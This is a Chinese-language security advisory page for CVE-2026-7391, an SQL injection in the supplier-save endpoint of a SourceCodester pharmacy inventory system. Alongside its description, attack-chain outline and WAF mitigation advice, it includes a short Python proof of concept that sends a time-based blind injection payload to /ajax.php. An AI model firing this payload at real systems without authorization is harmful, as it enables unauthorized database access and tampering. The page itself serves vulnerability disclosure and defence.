CVE-2026-7391 CVSS 6.3 中危

CVE-2026-7391 SourceCodester药店系统SQL注入漏洞

披露日期: 2026-04-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7391

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Pharmacy Sales and Inventory System

漏洞概述

SourceCodester Pharmacy Sales and Inventory System 1.0版本中存在严重的SQL注入安全漏洞。该漏洞源于/ajax.php?action=save_supplier接口未能正确过滤用户提交的ID参数。攻击者无需用户交互，仅需低权限账户即可通过网络发起攻击。成功利用该漏洞可能导致数据库敏感信息泄露、数据被非法篡改或删除，严重影响系统的机密性、完整性和可用性。建议管理员尽快检查并修复系统。

技术细节

该漏洞位于受影响系统的后端处理文件/ajax.php中的save_supplier函数处。系统在处理供应商保存请求时，直接将HTTP请求中的ID参数拼接到SQL查询语句中，未进行任何有效的输入验证或参数化查询处理。这种不安全的编码方式使得攻击者能够注入恶意的SQL语法。根据CVSS 3.1向量分析，攻击复杂度低（AC:L），且无需用户交互（UI:N），攻击者可利用低权限账户（PR:L）远程执行任意SQL命令。利用成功后，攻击者可绕过认证机制直接读取数据库中的敏感信息（如用户凭证、销售记录），或通过UPDATE/DELETE命令破坏数据完整性及可用性。由于漏洞利用代码已公开，风险显著增加。

攻击链分析

STEP 1

侦察

攻击者识别出目标运行的是SourceCodester Pharmacy Sales and Inventory System 1.0版本。

STEP 2

获取访问权限

攻击者注册或获取一个低权限账户（PR:L），满足漏洞利用的最低权限要求。

STEP 3

漏洞利用

攻击者向/ajax.php发送特制的POST请求，在action=save_supplier的ID参数中注入恶意SQL代码。

STEP 4

执行攻击

后端数据库解析并执行恶意SQL语句，导致数据泄露或被篡改（C:L/I:L/A:L）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-7391 SQL Injection
# Target: /ajax.php?action=save_supplier

import requests

def check_sqli(url):
    target = f"{url}/ajax.php"
    # Payload for time-based blind SQL injection
    payload = {
        "action": "save_supplier",
        "ID": "1' AND SLEEP(5)-- -"
    }
    
    try:
        print(f"[+] Sending payload to {target}")
        response = requests.post(target, data=payload, timeout=10)
        
        # Check if response time indicates SQL execution delay
        if response.elapsed.total_seconds() >= 5:
            print("[!] Vulnerable to SQL Injection!")
        else:
            print("[-] Not vulnerable or timeout adjusted.")
            
    except requests.RequestException as e:
        print(f"[Error] {e}")

if __name__ == "__main__":
    target_url = "http://target-ip" # Replace with actual target
    check_sqli(target_url)

影响范围

SourceCodester Pharmacy Sales and Inventory System 1.0

防御指南

临时缓解措施

在未升级补丁前，建议在Web应用防火墙（WAF）中部署规则，拦截针对/ajax.php接口的异常请求，特别是包含SQL关键字（如UNION, SELECT, OR, AND）和单引号等特殊字符的流量。同时，可暂时禁用供应商管理模块或限制仅内网IP访问该系统接口。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7391
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7391
3 Details https://www.cvedetails.com/cve/CVE-2026-7391/
4 VulDB https://vuldb.com/cve/CVE-2026-7391
5 Link https://github.com/microwaveabi/vul/issues/3
6 Link https://vuldb.com/submit/803106
7 Link https://vuldb.com/vuln/360116
8 Link https://vuldb.com/vuln/360116/cti
9 Link https://www.sourcecodester.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表